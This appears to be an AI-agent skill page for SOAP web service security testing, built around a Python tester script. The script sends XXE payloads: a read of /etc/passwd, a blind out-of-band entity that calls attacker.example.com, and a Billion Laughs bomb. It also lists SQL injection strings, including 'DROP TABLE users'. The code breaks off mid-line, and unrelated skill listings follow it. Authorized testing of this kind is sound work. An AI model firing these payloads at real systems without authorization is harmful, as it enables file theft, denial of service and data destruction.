performing-soap-web-service-security-testing
Perform security testing of SOAP web services by analyzing WSDL definitions and testing for XML injection, XXE, WS-Security bypass, and SOAPAction spoofing.
What this skill does
# Performing SOAP Web Service Security Testing
## Overview
SOAP (Simple Object Access Protocol) web services remain widely deployed in enterprise environments, financial systems, healthcare, and government integrations. Security testing of SOAP services involves analyzing WSDL (Web Services Description Language) definitions to understand available methods, testing for XML-based injection attacks (XXE, XPath injection, XML bombs), evaluating WS-Security implementation correctness, SOAPAction header spoofing, and assessing authentication and authorization controls. Unlike REST APIs, SOAP services use XML envelopes and often implement complex security standards that can be misconfigured.
## When to Use
- When conducting security assessments that involve performing soap web service security testing
- When following incident response procedures for related security events
- When performing scheduled security testing or auditing activities
- When validating security controls through hands-on testing
## Prerequisites
- Target SOAP web service endpoint URL
- WSDL file or URL access for the service
- SoapUI or ReadyAPI for structured testing
- Burp Suite with SOAP extensions for interception
- Python 3.8+ with zeep and lxml libraries
- Authorization to perform security testing
## Testing Methodology
### Phase 1: WSDL Reconnaissance
```python
#!/usr/bin/env python3
"""SOAP Web Service Security Testing Tool
Analyzes WSDL definitions and tests SOAP endpoints for
common vulnerabilities including XXE, injection, and
WS-Security misconfigurations.
"""
import requests
import xml.etree.ElementTree as ET
from lxml import etree
import sys
import re
from typing import List, Dict, Optional
from dataclasses import dataclass
@dataclass
class SOAPOperation:
name: str
action: str
input_message: str
output_message: str
parameters: List[Dict]
class SOAPSecurityTester:
NAMESPACES = {
'wsdl': 'http://schemas.xmlsoap.org/wsdl/',
'soap': 'http://schemas.xmlsoap.org/wsdl/soap/',
'soap12': 'http://schemas.xmlsoap.org/wsdl/soap12/',
'xsd': 'http://www.w3.org/2001/XMLSchema',
'wsse': 'http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd',
}
def __init__(self, wsdl_url: str, endpoint_url: Optional[str] = None):
self.wsdl_url = wsdl_url
self.endpoint_url = endpoint_url
self.operations: List[SOAPOperation] = []
self.findings: List[dict] = []
def parse_wsdl(self) -> List[SOAPOperation]:
"""Parse WSDL to extract available operations and parameters."""
response = requests.get(self.wsdl_url, timeout=30)
root = etree.fromstring(response.content)
# Extract endpoint URL if not provided
if not self.endpoint_url:
address = root.find('.//soap:address', self.NAMESPACES)
if address is not None:
self.endpoint_url = address.get('location')
# Extract operations
for binding_op in root.findall('.//wsdl:binding/wsdl:operation', self.NAMESPACES):
name = binding_op.get('name')
soap_op = binding_op.find('soap:operation', self.NAMESPACES)
action = soap_op.get('soapAction', '') if soap_op is not None else ''
operation = SOAPOperation(
name=name,
action=action,
input_message="",
output_message="",
parameters=[]
)
self.operations.append(operation)
print(f"[+] Found {len(self.operations)} SOAP operations")
for op in self.operations:
print(f" - {op.name} (SOAPAction: {op.action})")
return self.operations
def test_xxe_vulnerability(self, operation: SOAPOperation) -> dict:
"""Test for XML External Entity (XXE) injection."""
xxe_payloads = [
# Classic XXE - File read
{
"name": "Classic XXE (file read)",
"payload": '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<{operation}>&xxe;</{operation}>
</soapenv:Body>
</soapenv:Envelope>'''.format(operation=operation.name)
},
# Blind XXE - Out-of-band
{
"name": "Blind XXE (OOB)",
"payload": '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.example.com/xxe.dtd">
%xxe;
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<{operation}>test</{operation}>
</soapenv:Body>
</soapenv:Envelope>'''.format(operation=operation.name)
},
# XML Bomb (Billion Laughs)
{
"name": "XML Bomb (Billion Laughs)",
"payload": '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<{operation}>&lol4;</{operation}>
</soapenv:Body>
</soapenv:Envelope>'''.format(operation=operation.name)
}
]
results = []
for xxe in xxe_payloads:
try:
response = requests.post(
self.endpoint_url,
data=xxe["payload"],
headers={
"Content-Type": "text/xml; charset=utf-8",
"SOAPAction": operation.action,
},
timeout=10
)
vulnerable = False
indicators = []
if "root:" in response.text or "/bin/" in response.text:
vulnerable = True
indicators.append("File contents in response")
if response.status_code == 200 and "Fault" not in response.text:
indicators.append("No XML parsing error returned")
if response.elapsed.total_seconds() > 5:
indicators.append("Slow response (possible XML bomb)")
vulnerable = True
result = {
"test": xxe["name"],
"vulnerable": vulnerable,
"status_code": response.status_code,
"response_time": response.elapsed.total_seconds(),
"indicators": indicators
}
results.append(result)
if vulnerable:
self.findings.append({
"severity": "CRITICAL",
"type": "XXE",
"operation": operation.name,
"details": xxe["name"]
})
except requests.exceptions.Timeout:
results.append({
"test": xxe["name"],
"vulnerable": True,
"indicators": ["Request timed out - possible DoS via XML bomb"]
})
return {"operation": operation.name, "xxe_results": results}
def test_sql_injection(self, operation: SOAPOperation) -> dict:
"""Test SOAP parameters for SQL injection."""
sqli_payloads = [
"' OR '1'='1",
"1; DROP TABLE users--",
"1' UNION SELECT NULL,NULL,NULL--",
"' OR 1=1; WAITFOR DELAY '0:0:5'--",
"admin'/*",
]
results = []
for payload in sqli_payloads:
soap_body = f'''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<{oRelated in Security
mac-ops
IncludedComprehensive macOS workstation operations — diagnose kernel panics, identify failing drives, audit launchd startup items, decode wake reasons, triage TCC permission denials, manage APFS snapshots, recover from no-boot. Use for: Mac is slow, slow bootup, won't boot, kernel panic, kernel_task hot, mds_stores CPU, photoanalysisd, cloudd, login loop, gray screen, sleep wake failure, drive failing, IO errors, APFS snapshots eating space, Time Machine local snapshots, Spotlight indexing, launchd, LaunchAgent, LaunchDaemon, login items, TCC permissions, Full Disk Access, Screen Recording denied, Gatekeeper, quarantine, com.apple.quarantine, app is damaged, helper tool, /Library/PrivilegedHelperTools, pmset, wake reasons, dark wake, sysdiagnose, panic.ips, DiagnosticReports, configuration profile, MDM profile, remote diagnostics over SSH.
a11y-audit
IncludedRun accessibility audits on web projects combining automated scanning (axe-core, Lighthouse) with WCAG 2.1 AA compliance mapping, manual check guidance, and structured reporting. Output is configurable: markdown report only, markdown plus machine-readable JSON, or markdown plus issue tracker integration. Use this skill whenever the user mentions "accessibility audit", "a11y audit", "WCAG audit", "accessibility check", "compliance scan", or asks to check a web project for accessibility issues. Also trigger when the user wants to verify WCAG conformance or map findings to a specific standard (CAN-ASC-6.2, EN 301 549, ADA/AODA).
erpclaw
IncludedAI-native ERP system with self-extending OS. Full accounting, invoicing, inventory, purchasing, tax, billing, HR, payroll, advanced accounting (ASC 606/842, intercompany, consolidation), and financial reporting. 413 actions across 14 domains, 43 expansion modules. Constitutional guardrails, adversarial audit, schema migration. Double-entry GL, immutable audit trail, US GAAP.
assess
IncludedAssesses and rates quality 0-10 across multiple dimensions (correctness, maintainability, security, performance, testability, simplicity) with pros/cons analysis. Compares against project conventions and prior decisions from memory. Produces structured evaluation reports with actionable improvement suggestions. Use when evaluating code, designs, architectures, or comparing alternative approaches.
spring-boot-security-jwt
IncludedProvides JWT authentication and authorization patterns for Spring Boot 3.5.x covering token generation with JJWT, Bearer/cookie authentication, database/OAuth2 integration, and RBAC/permission-based access control using Spring Security 6.x. Use when implementing authentication or authorization in Spring Boot applications.
code-hardcode-audit
IncludedDetect hardcoded values, magic numbers, and leaked secrets. TRIGGERS - hardcode audit, magic numbers, PLR2004, secret scanning.